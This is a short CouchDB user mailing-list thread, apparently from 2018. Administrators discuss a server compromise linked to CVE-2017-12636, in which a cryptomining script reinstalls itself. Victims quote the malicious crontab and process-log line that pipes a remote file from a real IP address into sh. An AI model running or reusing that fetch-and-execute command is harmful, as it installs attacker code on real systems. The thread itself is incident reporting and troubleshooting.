The hackers are changing the name of the script to other names like logo4. It took my CouchDB down for a while and now has subsided. I searched the crontab of all the accounts and could not find evidence there. They must have evolved to another method of execution once it gets installed....
------ Original Message ------ Received: 06:15 AM MST, 02/22/2018 From: Michael Bykov <m.by...@gmail.com> To: user@couchdb.apache.org Subject: Re: logo6 2018-02-18 0:20 GMT+03:00 Robert Samuel Newson <rnew...@apache.org>: > sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html I have found malware script in crontab from user couchdb. This very line: /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh And yes, my version was 1.6 > > > B. > > > On 16 Feb 2018, at 11:50, Ingo Radatz <thewh...@googlemail.com> wrote: > > > > Hi Michael, > > > > i have experienced the same - this is a mining script. You can find the > shell scripts in /tmp and in new database-folders of your couchdb (1.6.1?) > installation. Finally i have moved to a new vm because the script could > install itself again and again. > > > > Ingo > > > >> On 16. Feb 2018, at 12:31, Michael Bykov <m.by...@gmail.com> wrote: > >> > >> I see now in logs: > >> > >> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_ > >> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh > >> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 | > >> \_ sh > >> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 | > >> \_ sleep 60 > >> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_ > >> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t > >> > >> What shold be done? > >> > >> > >> -- > >> М. > >> > >> http://diglossa.ru > >> xmpp://m.by...@jabber.ru > > > > -- М. http://diglossa.ru xmpp://m.by...@jabber.ru
